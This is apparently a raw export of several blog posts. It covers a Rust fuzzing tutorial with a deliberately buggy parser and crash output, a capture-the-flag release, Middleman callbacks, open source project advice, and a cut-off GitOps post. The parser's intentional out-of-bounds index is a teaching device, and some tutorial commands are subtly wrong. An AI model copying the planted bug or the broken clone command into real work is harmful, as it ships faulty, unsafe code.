algorithm and the interface is all based on libFuzzer, which is a widely-used, coverage-guided fuzzer for C/C++ and some other languages that implemented a proxy layer – just like cargo-fuzz.\n\nlibFuzzer (cargo-fuzz) and coverage-guided fuzzers in general have the following algorithm:\n\n```\n// pseudo code\nInstrument program for code coverage\nfor {\n  Choose random input from corpus\n  Mutate input\n  Execute input and collect coverage\n  If new coverage/paths are hit add it to corpus (corpus - directory with test-cases)\n}\n```\n\n## Building and running the fuzzer\n\nIf you are already familiar with this part you can skip to Continuous Fuzzing section.\n\nWe will start with 
[rust-fuzzing-example](https://gitlab.com/gitlab-org/security-products/demos/coverage-fuzzing/rust-fuzzing-example).\n\nFor the sake of the example, we have a simple [function](https://gitlab.com/gitlab-org/security-products/demos/coverage-fuzzing/rust-fuzzing-example/-/blob/master/src/lib.rs) with an off-by-one bug:\n\n```\npub fn parse_complex(data: &[u8]) -> bool{\n\tif data.len() == 5 {\n\t\tif data[0] == b'F' && data[1] == b'U' && data[2] == b'Z' && data[3] == b'Z' && data[4] == b'I' && data[5] == b'T' {\n\t\t\treturn true\n\t\t}\n\t}\n    return true;\n}\n```\n\nOur fuzz [function](https://gitlab.com/gitlab-org/security-products/demos/coverage-fuzzing/rust-fuzzing-example/-/blob/master/fuzz/fuzz_targets/fuzz_parse_complex.rs) will look like this and will be called by libFuzzer in an infinite loop with the generated data, according to the coverage-guided algorithm.\n\n```\n#![no_main]\n#[macro_use] extern crate libfuzzer_sys;\nextern crate example_rust;\n\nfuzz_target!(|data: &[u8]| {\n    let _ = example_rust::parse_complex(&data);\n});\n```\n\nTo run the fuzzer we need to build an instrumented version of the code together with the fuzz function.\ncargo-fuzz is doing for us the heavy lifting so it can be done using the following simple steps:\n\n```\n# cargo-fuzz is available in rust nightly\ndocker run -it rustlang/rust:nightly-stretch /bin/bash\ncargo install cargo-fuzz\n\n# Download the example repo, build, and run the fuzzer\ngit clone https://gitlab.com/gitlab-org/security-products/demos/coverage-fuzzing/rust-fuzzing-example/-/blob/master/fuzz/fuzz_targets/fuzz_parse_complex.rs\ncd example-rust\ncargo fuzz run fuzz_parse_complex\n\n## The output should look like this:\n#524288 pulse  cov: 105 ft: 99 corp: 6/26b lim: 517 exec/s: 131072 rss: 93Mb\n#1048576        pulse  cov: 105 ft: 99 corp: 6/26b lim: 1040 exec/s: 116508 rss: 229Mb\n==2208== ERROR: libFuzzer: deadly signal\n    #0 0x5588b8234961  
(/example-rust/fuzz/target/x86_64-unknown-linux-gnu/debug/fuzz_parse_complex+0x83961)\n    #1 0x5588b8262dc5  (/example-rust/fuzz/target/x86_64-unknown-linux-gnu/debug/fuzz_parse_complex+0xb1dc5)\n    #2 0x5588b8284734  (/example-rust/fuzz/target/x86_64-unknown-linux-gnu/debug/fuzz_parse_complex+0xd3734)\n    #3 0x5588b82845e9  (/example-rust/fuzz/target/x86_64-unknown-linux-gnu/debug/fuzz_parse_complex+0xd35e9)\n    #4 0x5588b826493a  (/example-rust/fuzz/target/x86_64-unknown-linux-gnu/debug/fuzz_parse_complex+0xb393a)\n    #5 0x7f93737e70df  (/lib/x86_64-linux-gnu/libpthread.so.0+0x110df)\n    #6 0x7f9373252ffe  (/lib/x86_64-linux-gnu/libc.so.6+0x32ffe)\n    #7 0x7f9373254429  (/lib/x86_64-linux-gnu/libc.so.6+0x34429)\n    #8 0x5588b82a4a06  (/example-rust/fuzz/target/x86_64-unknown-linux-gnu/debug/fuzz_parse_complex+0xf3a06)\n    #9 0x5588b82a1b75  (/example-rust/fuzz/target/x86_64-unknown-linux-gnu/debug/fuzz_parse_complex+0xf0b75)\n    #10 0x5588b824fa1b  (/example-rust/fuzz/target/x86_64-unknown-linux-gnu/debug/fuzz_parse_complex+0x9ea1b)\n    #11 0x5588b82a442b  (/example-rust/fuzz/target/x86_64-unknown-linux-gnu/debug/fuzz_parse_complex+0xf342b)\n    #12 0x5588b82a3ee1  (/example-rust/fuzz/target/x86_64-unknown-linux-gnu/debug/fuzz_parse_complex+0xf2ee1)\n    #13 0x5588b82a3dd5  (/example-rust/fuzz/target/x86_64-unknown-linux-gnu/debug/fuzz_parse_complex+0xf2dd5)\n    #14 0x5588b82b6cd9  (/example-rust/fuzz/target/x86_64-unknown-linux-gnu/debug/fuzz_parse_complex+0x105cd9)\n    #15 0x5588b82b6c94  (/example-rust/fuzz/target/x86_64-unknown-linux-gnu/debug/fuzz_parse_complex+0x105c94)\n    #16 0x5588b824edda  (/example-rust/fuzz/target/x86_64-unknown-linux-gnu/debug/fuzz_parse_complex+0x9ddda)\n    #17 0x5588b81c45b7  (/example-rust/fuzz/target/x86_64-unknown-linux-gnu/debug/fuzz_parse_complex+0x135b7)\n    #18 0x5588b824f7e4  (/example-rust/fuzz/target/x86_64-unknown-linux-gnu/debug/fuzz_parse_complex+0x9e7e4)\n    #19 0x5588b827da53  
(/example-rust/fuzz/target/x86_64-unknown-linux-gnu/debug/fuzz_parse_complex+0xcca53)\n    #20 0x5588b82a4a18  (/example-rust/fuzz/target/x86_64-unknown-linux-gnu/debug/fuzz_parse_complex+0xf3a18)\n\nNOTE: libFuzzer has rudimentary signal handlers.\n      Combine libFuzzer with AddressSanitizer or similar for better crash reports.\nSUMMARY: libFuzzer: deadly signal\nMS: 2 ShuffleBytes-ChangeByte-; base unit: 89b92cdd9bcb9b861c47c0179eff7b3a9baafcde\n0x46,0x55,0x5a,0x5a,0x49,\nFUZZI\nartifact_prefix='/example-rust/fuzz/artifacts/fuzz_parse_complex/'; Test unit written to /example-rust/fuzz/artifacts/fuzz_parse_complex/crash-df779ced6b712c5fca247e465de2de474d1d23b9\nBase64: RlVaWkk=\n```\n\nThis find the bug in a few seconds, prints the “FUZZI” string that triggers the vulnerability and saves it to a file.\n\n## Running cargo-fuzz from CI\n\nThe best way to integrate go-fuzz fuzzing with Gitlab CI/CD is by adding additional stage and step to your `.gitlab-ci.yml`. It is straightforward and [fully documented](https://docs.gitlab.com/ee/user/application_security/coverage_fuzzing/#configuration).\n\n```\ninclude:\n  - template: Coverage-Fuzzing.gitlab-ci.yml\n\nmy_fuzz_target:\n  extends: .fuzz_base\n  script:\n    - apt-get update -qq && apt-get install -y -qq git make clang cmake\n    - export CC=`which clang`\n    - export CXX=`which clang++`\n    - cargo install cargo-fuzz\n    - cargo fuzz run fuzz_parse_complex -- -runs=0\n    - ./gitlab-cov-fuzz run --regression=$REGRESSION -- ./fuzz/target/x86_64-unknown-linux-gnu/release/fuzz_parse_complex\n```\n\nFor each fuzz target you will have to create a step which extends `.fuzz_base` that runs the following:\n\n- Builds the fuzz target.\n- Runs the fuzz target via gitlab-cov-fuzz CLI.\n- For `$CI_DEFAULT_BRANCH` (can be override by `$COV_FUZZING_BRANCH`) will run fully fledged fuzzing sessions. 
For everything else including MRs will run fuzzing regression with the accumulated corpus and fixed crashes.\n\nThis will run your fuzz tests in a blocking manner inside your pipeline. There is also a possibility to run longer fuzz sessions asynchronously, as described in the [docs](https://docs.gitlab.com/ee/user/application_security/coverage_fuzzing/#continuous-fuzzing-long-running-async-fuzzing-jobs).\n\nCheck out our [full documentation](https://docs.gitlab.com/ee/user/application_security/coverage_fuzzing/) and the [example repo](https://gitlab.com/gitlab-org/security-products/demos/coverage-fuzzing/rust-fuzzing-example) and try adding fuzz testing to your own repos!\n\nCover image by [Zsolt Palatinus](https://unsplash.com/@sunitalap) on [Unsplash](https://unsplash.com/)\n",[9,752],{"slug":3132,"featured":6,"template":689},"how-to-fuzz-rust-code","content:en-us:blog:how-to-fuzz-rust-code.yml","How To Fuzz Rust Code","en-us/blog/how-to-fuzz-rust-code.yml","en-us/blog/how-to-fuzz-rust-code",{"_path":3138,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":3139,"content":3145,"config":3151,"_id":3153,"_type":14,"title":3154,"_source":16,"_file":3155,"_stem":3156,"_extension":19},"/en-us/blog/how-to-play-gitlab-ctf-at-home",{"title":3140,"description":3141,"ogTitle":3140,"ogDescription":3141,"noIndex":6,"ogImage":3142,"ogUrl":3143,"ogSiteName":673,"ogType":674,"canonicalUrls":3143,"schema":3144},"How to play GitLab's Capture the Flag at home","Our AppSec team built and ran a CTF, and now it's available for you to play at home.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749681485/Blog/Hero%20Images/gitlab_ctf.png","https://about.gitlab.com/blog/how-to-play-gitlab-ctf-at-home","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"How to play GitLab's Capture the Flag at home\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Joern Schneeweisz\"}],\n        
\"datePublished\": \"2020-08-12\",\n      }",{"title":3140,"description":3141,"authors":3146,"heroImage":3142,"date":3148,"body":3149,"category":865,"tags":3150},[3147],"Joern Schneeweisz","2020-08-12","\n\nThe GitLab Application Security team created a [Capture the Flag (CTF)](https://en.wikipedia.org/wiki/Capture_the_flag#Computer_security) contest for GitLab team members in mid-March to provide a fun, hands-on AppSec experience for those who were interested in a little friendly competition.\n\nWe've reworked this contest a bit so now you can solve the challenges at home!\nAnd, even better, because we created this CTF with all of our GitLab team members in mind, there's a wide variety of beginner-friendly challenges, most of which are related to web security.\n\n## Run it at home\nAll you need to run this at home is [Docker](https://docs.docker.com/get-docker/) and [Docker Compose](https://docs.docker.com/compose/install/). The [CTF-at-home repository](https://gitlab.com/gitlab-com/gl-security/ctf-at-home) is where we're releasing the challenges within a `docker-compose` file. Be sure to have a look at the [README](https://gitlab.com/gitlab-com/gl-security/ctf-at-home/-/blob/master/README.md) for set-up instructions.\n\nRunning the challenges should be as simple as:\n\n```\ngit clone https://gitlab.com/gitlab-com/gl-security/ctf-at-home.git\ncd ctf-at-home\ndocker-compose up\n```\n\nAnd then, visit `http://capture.local.thetanuki.io` to get to the landing page. Fingers crossed🤞, it worked on my machine 😉.\n\n## Try your hand at solving some challenges, then tell us about it\n\nTo keep it beginner friendly, the run-at-home CTF also includes spoilers and solutions for all challenges. If you have trouble running the CTF feel free to [create an issue here](https://gitlab.com/gitlab-com/gl-security/ctf-at-home/-/issues/new).\n\nIf you run the CTF at home and solve some challenges, we're happy to hear your feedback, or even see some write-ups. 
Feel free to share your experience in the comments below or tweet [@gitlab](https://twitter.com/gitlab).\n\n## Our results 🥁\n\nWe initially planned this CTF contest for [GitLab Contribute](/events/gitlab-contribute/), our company-wide get together, which was to be held in Prague at end of March. While COVID-19 made the physical get-together impossible, this CTF was perfect for running worldwide online and across GitLab teams. We ran the challenges from March 16 to March 27, 2020 and had a total of 50 GitLab team members participate in CTF.\n\n### Team member testimonials\n\nFrom a CTF coordinator perspective, running the contest was a great experience. Thankfully, the players were having a good time as well and we received lots of positive feedback, including:\n\n> It was great to collaborate with folks from all different functional groups at GitLab and all around the world. We learned a lot from each other and everyone was able to contribute!\n\n-- [@stkerr](/company/team/#stkerr)\n\n> The perfect mixture of challenges, ranging from very awesome and interesting, to very awesome and challenging. 😆\n\n-- [@cat](/company/team/#cat)\n\n### Hall of Fame\n\nMeet our top twenty players\n\n1. [@cat](/company/team/#cat)\n2. [@ayufan](/company/team/#ayufan)\n3. [@engwan](/company/team/#engwan)\n4. [@vitallium](/company/team/#vitallium)\n5. [@stkerr](/company/team/#stkerr)\n6. [@T4cC0re](/company/team/#T4cC0re)\n7. [@xanf](/company/team/#xanf)\n8. [@ahmadsherif](/company/team/#ahmadsherif)\n9. [@mbobin](/company/team/#mbobin)\n10. [@jrreid](/company/team/#jrreid)\n11. [@djadmin](/company/team/#djadmin)\n12. [@vij](/company/team/#vij)\n13. [@robotmay](/company/team/#robotmay_gitlab)\n14. [@kgoossens](/company/team/#kgoossens)\n15. [@simon_mansfield](/company/team/#simon_mansfield)\n16. [@alan](/company/team/#alan)\n17. [@SteveTerhar](/company/team/#SteveTerhar)\n18. [@rchan-gitlab](/company/team/#rchan-gitlab)\n19. [@razer6](/company/team/#razer6)\n20. 
[@floudet](/company/team/#floudet)\n\n__Special shout-outs to [@cat](/company/team/#cat) and [@ayufan](/company/team/#ayufan) who both solved ALL the challenges in less than three days.__\n\nBecause building the challenges and playing the CTF were such a positive experience for all involved, we wanted to make those CTF challenges public. We're hoping to have another CTF in the future, but in the meantime, let us know what you think of this one via comment below or [@gitlab](https://twitter.com/gitlab) on Twitter.\n\nHappy hacking!\n",[865,3091,9],{"slug":3152,"featured":6,"template":689},"how-to-play-gitlab-ctf-at-home","content:en-us:blog:how-to-play-gitlab-ctf-at-home.yml","How To Play Gitlab Ctf At Home","en-us/blog/how-to-play-gitlab-ctf-at-home.yml","en-us/blog/how-to-play-gitlab-ctf-at-home",{"_path":3158,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":3159,"content":3164,"config":3170,"_id":3172,"_type":14,"title":3173,"_source":16,"_file":3174,"_stem":3175,"_extension":19},"/en-us/blog/how-to-read-open-source-finding-middleman-callbacks",{"title":3160,"description":3161,"ogTitle":3160,"ogDescription":3161,"noIndex":6,"ogImage":1007,"ogUrl":3162,"ogSiteName":673,"ogType":674,"canonicalUrls":3162,"schema":3163},"How to Read Open Source: Finding Middleman Callbacks","Open source empowers you to learn beyond existing documentation. Getting started can be confusing. 
This is a demonstration finding unlisted Middleman callbacks.","https://about.gitlab.com/blog/how-to-read-open-source-finding-middleman-callbacks","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"How to Read Open Source: Finding Middleman Callbacks\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Tyler Williams\"}],\n        \"datePublished\": \"2021-01-20\",\n      }",{"title":3160,"description":3161,"authors":3165,"heroImage":1007,"date":3167,"body":3168,"category":951,"tags":3169},[3166],"Tyler Williams","2021-01-20","        \n\n{::options parse_block_html=\"true\" /}\n\n\n\n## Why read open source? \n\nWhen folks write about open source, I think there is a strong emphasis on contributing to open source projects, which makes sense. Many software professionals are excited to give back to the community. \n\nBut beyond adding to your favorite project, open source philosophies have a number of other benefits in our daily lives. In particular, I love open source because it allows me to learn more about my tools when the documentation is out of date, incomplete, or leaves me with additional questions from my own curiosity. \n\nThis happened to me recently when I was working on [https://about.gitlab.com](https://about.gitlab.com), a static site built with [Middleman](https://middlemanapp.com/). I needed to find a more comprehensive list of available [callbacks](https://middlemanapp.com/advanced/custom-extensions/#callbacks) in the Middleman lifecycle.\n\nI hope this blog post is helpful if you're looking for existing Middleman callbacks, or if you're getting started reading through the source code of your favorite open source tools. \n\n## The task at hand\n\nIf you're getting started reading open source, I find it helps to have a specific task. Any unfamiliar codebase can be challenging to navigate. Having a goal in mind narrows your focus. 
Here was my task for Middleman:\n\nI recently created a merge request to [add Webpack devServer to the local development environment](https://gitlab.com/gitlab-com/www-gitlab-com/-/merge_requests/71845). I had to modify some existing behavior of our Middleman preview server and wanted to use one of the lifecycle callbacks to modify the preview server's log output. \n\nHowever, the Middleman documentation does not currently list all available callbacks, nor where they happen in the lifecycle. The [extension docs](https://middlemanapp.com/advanced/custom-extensions/) say: \n\n> Middleman extensions are Ruby classes which can hook into various points of the Middleman system, add new features and manipulate content. This guide explains some of what's available, but you should read the Middleman source and the source of plugins like middleman-blog to discover all the hooks and extension points.\n\nI took them up on their advice and read through the [Middleman source code](https://github.com/middleman/middleman) to find the available callbacks. Here's what I found, and how I found them.\n\n## Callbacks available in Middleman Core\n\n1. `initialized`: called before config is parsed, and before extensions are registered\n1. `configure`: called to run any `configure` blocks (once for current environment, again for the current mode)\n1. `before_extensions`: called before the `ExtensionManager` is instantiated\n1. `before_instance_block`: called before any blocks are passed to the configuration context\n1. `before_sitemap`: called before the `SiteMap::Store` is instantiated, which initializes the sitemap\n1. `before_configuration`: called before configuration is parsed, mostly used for extensions\n1. `after_configuration`: called after extensions have worked\n1. `after_configuration_eval`: called after the configuration is parsed, before the pre-extension callback\n1. `ready`: called when everything is stable\n1. `before_build`: called before the site build process runs\n1. 
`after_build`: called after the builder is complete\n1. `before_shutdown`: called in the `shutdown!` method, which lets users know the application is shutting down\n1. `before`: called before Rack requests\n1. `before_server`: called before the `PreviewServer` is created\n1. `reload`: called before the new application is initialized on a reload event\n\n## How to find Middleman Callbacks\n\n1. [Clone](https://docs.gitlab.com/ee/gitlab-basics/start-using-git.html) the [Middleman repository](https://github.com/middleman/middleman) to your local machine. \n1. Open the Middleman directory in a text editor, IDE, or any tool that allows you to easily search through a folder's files for specific strings. \n1. Start with the [existing documentation](https://middlemanapp.com/advanced/custom-extensions/#callbacks) if it exists. Middleman lists the names of a few callbacks. You can search the directory for the string `after_configuration`.\n1. In this instance, you should be able to find that string used like so: `execute_callbacks(:after_configuration)`.\n1. You may also find it listed with other similar symbols in `middleman-core/lib/middleman-core/application.rb`. \n1. Read through the related blocks of code around these search results, you'll get some additional context for how they work, and you may find additional search terms that will be helpful.\n1. In the case of Middleman callbacks, you can continue to search for combinations of the `execute_callbacks` method with any callback listed in `middleman-core/lib/middleman-core/application.rb` to find where and when specific callbacks are used.\n\n## Contribute!\n\nWith this in-depth knowledge of your tool, you can be more productive at your day-to-day work, and you can contribute back to open source more easily. 
\n\nIn my case, I was able to identify the best callback for my usecase, and I now plan to check in with the Middleman team and ask if they would accept a contribution to their documentation with this information so it's easier for other folks to find in the future.\n",[9,752,686],{"slug":3171,"featured":6,"template":689},"how-to-read-open-source-finding-middleman-callbacks","content:en-us:blog:how-to-read-open-source-finding-middleman-callbacks.yml","How To Read Open Source Finding Middleman Callbacks","en-us/blog/how-to-read-open-source-finding-middleman-callbacks.yml","en-us/blog/how-to-read-open-source-finding-middleman-callbacks",{"_path":3177,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":3178,"content":3183,"config":3189,"_id":3191,"_type":14,"title":3192,"_source":16,"_file":3193,"_stem":3194,"_extension":19},"/en-us/blog/how-to-start-a-great-oss-project",{"title":3179,"description":3180,"ogTitle":3179,"ogDescription":3180,"noIndex":6,"ogImage":1447,"ogUrl":3181,"ogSiteName":673,"ogType":674,"canonicalUrls":3181,"schema":3182},"How to start a great OSS project","In a modern DevOps world it's never been more critical to embrace open source. Here's everything you need to know to get started.","https://about.gitlab.com/blog/how-to-start-a-great-oss-project","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"How to start a great OSS project\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Mike Vanbuskirk\"}],\n        \"datePublished\": \"2022-10-18\",\n      }",{"title":3179,"description":3180,"authors":3184,"heroImage":1447,"date":3186,"body":3187,"category":10,"tags":3188},[3185],"Mike Vanbuskirk","2022-10-18","\nIf you spend any time coding, you've probably considered starting an OSS project at some point. Of course, the natural temptation is to immediately sit down and start writing code. 
That's a great approach that many projects have started from, but what about when it's time to let others contribute?\n\nAn OSS project is as much about community as it is code, and the key to building a good project is providing an inviting, productive place for that community to work and create. How can new contributors be onboarded smoothly? What kind of maintenance and automation will allow the project to scale beyond the scope of its original creator's time and resources? This article hopes to answer a few of these questions and provide first-time project maintainers with a solid foundation for launching a great OSS project.\n\n## Create a great README.md\n\nA README file is the \"entry point\" to an OSS project. Most distributed version control software hosting platforms like GitLab make the README file the first thing a visitor sees when viewing the repo. A good README manages to convey important information about a project while focusing on ease of navigation and reading and grabs the attention of potential contributors and users.\n\nTo start, maintainers should familiarize themselves with [Markdown](https://www.markdownguide.org), the markup language used for most OSS project documentation files like README. Markdown is a simple, elegant tool for crafting content and it's helpful to be aware of its features and capabilities.\n\nFor the README file itself, there are some things maintainers can include that will help drive productive participation and engagement.\n\n### Overview of the project\n\nA great way to draw attention to your project is to lead with a UI or CLI screenshot of the software. Even better: record some basic usage and convert it to a GIF using an OSS (of course!) tool like [Terminalizer](https://github.com/faressoft/terminalizer). 
The overview should also include the \"why\" of the project; it should be clear what problem or problems the project solves, and what drove the maintainer to create the project.\n\n### How to install and use it\n\nOSS project users can often become OSS project contributors; a well-run and well-documented project goes a long way towards bringing more contributors into the fold. Users should be presented with clear, concise, and most importantly correct instructions for installing and using the software contained in the project. Potential users and contributors are likely to be put off by confusing, complex, or non-functional installation instructions.\n\n### Links to documentation\n\nNot all project documentation does or even should fit inside the README file. Your project likely depends on one or more programming languages, as well as the many development tools, libraries, and modules in the language ecosystem. The README should serve as a project portal; linking to third-party documentation as needed, rather than as a comprehensive collection of all relevant documentation in one place.\n\n### Links to Code of Conduct\n\nThe global OSS project community is made up of a great many individuals, representing a rich, diverse spectrum of backgrounds and identities. With that in mind, an OSS project needs to provide a welcoming, inclusive Code of Conduct with firm and clear rules around expected behavior and decorum. One option is [Contributor Covenant](https://www.contributor-covenant.org/). A shared understanding of what defines good conduct is a pillar of a good community.\n\n### Links and instructions for reporting bugs or requesting features\n\nIf OSS project users become contributors, a great way to foster this transition is to make it easy to report bugs or request features. 
Ideally, this is where your README file links to your CONTRIBUTING.md file as well.\n\nA great example of an OSS project with an awesome README is [Leapp](https://github.com/Noovolari/leapp#readme); here’s another [example on GitLab](https://gitlab.com/CalcProgrammer1/OpenRGB/-/blob/master/README.md). This [Hacker News discussion](https://news.ycombinator.com/item?id=30106264) further demonstrates the power of the OSS project community in helping drive better engagement.\n\n## Creating a great CONTRIBUTING.md is important too\n\nThe CONTRIBUTING.md file represents another very important piece of documentation in an OSS project. Ideally, a CONTRIBUTING file should contain clear instructions for how individuals can get started contributing to your project. It's also important to be cognizant of first-time contributors to your project versus first-time contributors to OSS. For first-time OSS participants, it can be helpful to include links [like this](https://opensource.guide/how-to-contribute/).\n\nThe focus should be on technical detail; clear, concise instructions for how to clone, build, test, and commit are just some of what should be included. An adequate amount of detail and context is important, especially around what pre-requisite knowledge is expected and where it can be gained. The goal is to provide a deterministic path for contributors, with the end-state being a well-formed Merge Request. The [GitLab document](https://about.gitlab.com/community/contribute/) provides an excellent example.\n\nThe documentation for contributing should include:\n\n### An introductory message\n\nThis should be a warm and welcoming message that encourages individuals to participate, but also gives them the right foundation and context for creating successful and helpful commits.\n\n### How to set up a development environment\n\nDevelopment environments can be tricky to get right. Contributors may be working from a variety of different operating systems, IDEs, and hardware. 
Focus on making your project as environment agnostic as possible. Containerization tools like [Docker](https://www.docker.com) can help by isolating dependencies within the boundaries of a container environment. Ideally, as the project grows, you can take advantage of CI/CD automation to standardize things like linting and testing in a controlled environment or provide a one-click deployment option via something like [GitPod](https://www.gitpod.io).\n\n### How to run tests\n\nEarly in the project lifecycle, testing will probably be a minimal, non-comprehensive affair. Contributors will need to have clear guidance on setting up local development and testing to ensure their commits don't break existing functionality. Tests are another aspect of contributions that benefit heavily from automation.\n\n### Links to resources, including a style guide, the primary discussion medium, etc...\n\nContributors will almost always need to refer to additional resources to help them complete their work. The Contributing doc is a great place to link helpful and relevant documentation, including style guides, as well as third-party information. You should also highlight where the primary discussion medium for the project is hosted, which can be something like Slack, Discord, or within the repository itself.\n\n### Specific instructions on reporting bugs, and submitting changes/features\n\nBe specific and explicit with instructions for bugs, changes, and features. Providing this up-front reduces the amount of time that might be spent requesting basic formatting changes or additional information that's typically always needed on these topics.\n\n### Less experienced contributors? Suggest first-time issues\n\nContributing to OSS can be very intimidating for first-time contributors. It can be extremely helpful not just for your project, but for the entire OSS ecosystem to label issues that are ideal for first-time contributions. 
GitLab uses the [quick win](https://gitlab.com/gitlab-org/gitlab/-/issues/?sort=created_date&state=opened&label_name%5B%5D=quick%20win&first_page_size=20) label to highlight such issues.\n\nSome criteria that make for good first issues:\n- User-facing documentation updates\n- Adding unit tests\n- Well-scoped bug fixes, with an obvious end-state or success metric\n- Writing good code comments. Python docstrings are great for defining class and method behavior and are read by a variety of tools.\n\n## Choose a good license\n\nAn often overlooked, but no less important, part of starting an OSS project is choosing a good license. The sometimes verbose legal language of OSS licenses, as well as the scare stories of them being applied inappropriately, can be intimidating to first-time contributors.\n\nFortunately, tools like [Choose a license](https://choosealicense.com/) are available, allowing maintainers to make an informed choice about which license model is the best fit for the project.\n\nThe MIT and Apache licenses are common choices for OSS projects, but each project and maintainer are unique. Something else to consider is that a lot of OSS contributors often work professionally as software engineers, and may be subject to rules that prohibit or limit OSS contributions based on intellectual property concerns.\n\n## Use templates to make OSS maintenance easier\n\nEarly in the life of your OSS project, there are likely to only be a few contributors. The inflow of pull requests, issues and feature work will generally be pretty manageable at this stage. The need for automation and well-defined processes won't be immediately obvious, but once the project scales it's very easy to feel overwhelmed without some structure in place.\n\nTemplates are a great way to help establish some formal processes for dealing with common workflows in OSS projects. 
For most version control platforms, templates are Markdown documents that allow maintainers to pre-define the format and structure of things like issues, pull requests, and merge requests. There are some good examples of [issue templates here](https://gitlab.com/gitlab-org/gitlab/-/tree/master/.gitlab/issue_templates), as well as [templates for merge requests](https://gitlab.com/gitlab-org/gitlab/-/tree/master/.gitlab/merge_request_templates).\n\nGiving contributors a clear picture of the required information up front saves a lot of time and headache, and avoids the dance of maintainers having to frequently ask follow-up questions on issues to get a clear picture of the actual technical problem at hand. Once your project hits a critical mass of participation, it's very important to have a good structure of templates in place to allow you, and eventually other maintainers to leverage their time.\n\nAnother easy win for ease of maintenance is committing a well-formed gitignore file that's relevant to the type of project and language choice. The [SCM Git docs](https://git-scm.com/docs/gitignore) provide great documentation.\n\n## Automate your OSS project\n\nLeveraging maintainer resources and time is the key to successfully growing an OSS project. Beyond templates, some platforms allow maintainers to automate significant portions of the building and deployment of their projects.\n\nOne piece of automation that should be familiar to anyone with experience in a DevOps environment is Continuous Integration/Continuous Delivery(CI/CD) pipelines. CI/CD tools enable engineers to define a repeatable workflow that can lint, analyze, test, and deploy code while providing fast feedback on the outcome of each step. For example: a project using Python could integrate [pyflakes](https://gitlab.com/dnsmichi/api-playground/-/blob/main/.gitlab-ci.yml) into its CI workflow, ensuring all contributions are tested with a common standard for linting and syntax. 
Even [Markdown code can be tested](https://gitlab.com/gitlab-de/playground/markdown-lint-challenge/-/blob/main/.gitlab-ci.yml) this way! If maintainers want to take this pattern even further, a tool like [MKDocs can be integrated into a CI/CD workflow](https://gitlab.com/dnsmichi/opsindev.news/-/blob/main/.gitlab-ci.yml) as well to automatically generate documentation for the project. For busy maintainers, automating the typically tedious process of writing and updating documentation is a huge win.\n\nWith automation deployed, status badges can be a great way to provide contributors with a holistic view of the state of things like test coverage, build status, CI/CD health, and the current release version. The status badges on [this project](https://gitlab.com/gitlab-de/use-cases/iac-tf-vuln-module) provide both users and contributors with an at-a-glance understanding of pipeline health, and the most current release version of the module.\n\nFor anyone thinking about starting a project or already maintaining an open source project, the [GitLab for Open Source](https://about.gitlab.com/solutions/open-source/) program provides maintainers access to Ultimate features for free, which includes many valuable Security features as well as additional CI minutes.\n\n## Great OSS projects aren't just code\n\nCode is of central importance to open source software. However, an OSS project is more than just code. It's a community of diverse individuals participating in a shared goal. To help achieve that goal, it's crucial to provide a well-maintained space for that community to participate.\n\nSaying thanks for every contribution, welcoming everyone, and encouraging them to stay with feedback can also help make the project an inviting space. 
Along the way, you'll find new maintainers, and friends as well.\n\n_GitLab developer evangelist Michael Friedrich made significant contributions to this post._\n",[685,9,708],{"slug":3190,"featured":6,"template":689},"how-to-start-a-great-oss-project","content:en-us:blog:how-to-start-a-great-oss-project.yml","How To Start A Great Oss Project","en-us/blog/how-to-start-a-great-oss-project.yml","en-us/blog/how-to-start-a-great-oss-project",{"_path":3196,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":3197,"content":3203,"config":3209,"_id":3211,"_type":14,"title":3212,"_source":16,"_file":3213,"_stem":3214,"_extension":19},"/en-us/blog/how-to-use-oci-images-as-the-source-of-truth-for-continuous-delivery",{"title":3198,"description":3199,"ogTitle":3198,"ogDescription":3199,"noIndex":6,"ogImage":3200,"ogUrl":3201,"ogSiteName":673,"ogType":674,"canonicalUrls":3201,"schema":3202},"How to use OCI images as the source of truth for continuous delivery","Discover the benefits of using Open Container Initiative images as part of GitOps workflows and the many features GitLab offers to simplify deployments to Kubernetes.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1750097601/Blog/Hero%20Images/Blog/Hero%20Images/REFERENCE%20-%20Use%20this%20page%20as%20a%20reference%20for%20thumbnail%20sizes_76Tn5jFmEHY5LFj8RdDjNY_1750097600692.png","https://about.gitlab.com/blog/how-to-use-oci-images-as-the-source-of-truth-for-continuous-delivery","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"How to use OCI images as the source of truth for continuous delivery\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Daniel Helfand\"}],\n        \"datePublished\": \"2025-02-19\",\n      }",{"title":3198,"description":3199,"authors":3204,"heroImage":3200,"date":3206,"body":3207,"category":10,"tags":3208},[3205],"Daniel Helfand","2025-02-19","Is 
[GitOps](https://about.gitlab.com/topics/gitops/) still GitOps if you are not using a git repository as your deployment artifact? While git remains central to GitOps workflows, storing infrastructure definitions as Open Container Initiative (OCI) artifacts in container registries has seen a rise in adoption as the source for GitOps deployments. In this article, we will dive deeper into the ideas behind this trend and how GitLab features support this enhancement to GitOps workflows.\n\n## What is GitOps?\n\nThe [OpenGitOps](https://opengitops.dev/) project has defined [four principles](https://opengitops.dev/#principles) for the practice of GitOps:\n- A [system managed by GitOps](https://github.com/open-gitops/documents/blob/v1.0.0/GLOSSARY.md#software-system) must have its [desired state expressed declaratively](https://github.com/open-gitops/documents/blob/v1.0.0/GLOSSARY.md#declarative-description).\n- Desired state is stored in a way that enforces immutability and versioning, and retains a complete version history.\n- Software agents automatically pull the desired state declarations from the source.\n- Software agents [continuously](https://github.com/open-gitops/documents/blob/v1.0.0/GLOSSARY.md#continuous) observe actual system state and [attempt to apply the desired state](https://github.com/open-gitops/documents/blob/v1.0.0/GLOSSARY.md#reconciliation).\n\nAn example of GitOps is storing the Kubernetes manifests for a microservice in a GitLab project. Those Kubernetes resources are then continuously 